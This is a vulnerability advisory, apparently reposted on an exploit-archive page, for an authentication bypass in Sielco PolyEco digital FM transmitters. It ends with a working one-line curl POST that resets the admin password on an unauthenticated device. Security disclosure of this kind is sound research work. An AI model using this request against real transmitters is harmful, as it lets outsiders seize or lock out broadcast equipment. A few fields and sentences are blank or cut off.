Sielco PolyEco Digital FM Transmitter 2.0.6 – Account Takeover / Lockout / EoP

  • 作者: LiquidWorm
    日期: 2023-04-14
  • 类别:
  • 来源:
  • ## Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Account Takeover / Lockout / EoP
    ## Exploit Author: LiquidWorm
    Vendor: Sielco S.r.l
    Product web page:
    Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19
    PolyEco1000 CPU:1.9.4 FPGA:10.19
    PolyEco1000 CPU:1.9.3 FPGA:10.19
    PolyEco500 CPU:1.7.0 FPGA:10.16
    PolyEco300 CPU:2.0.2 FPGA:10.19
    PolyEco300 CPU:2.0.0 FPGA:10.19
    Summary: PolyEco is the innovative family of high-end digital
    FM transmitters of Sielco. They are especially suited as high
    performance power system exciters or compact low-mid power
    transmitters. The same cabinet may in fact be fitted with 50,
    100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,
    All features can be controlled via the large touch-screen display
    4.3" or remotely. Many advanced features are inside by default
    in the basic version such as: stereo and RDS encoder, audio
    change-over, remote-control via LAN and SNMP, "FFT" spectral
    analysis of the audio sources, SFN synchronization and much more.
    Desc: The application suffers from an authentication bypass,
    account takeover/lockout and elevation of privileges vulnerability
    that can be triggered by directly calling the users object and
    effectively modifying the password of the two constants user/role
    (user/admin). This can be exploited by an unauthenticated adversary
    by issuing a single POST request to the vulnerable endpoint and
    gain unauthorized access to the affected device with administrative
    Tested on: lwIP/2.1.1 (
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    Macedonian Information Security Research and Development Laboratory
    Zero Science Lab - - @zeroscience
    Advisory ID: ZSL-2023-5765
    Advisory URL:
    # Change admin pwd
    $ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm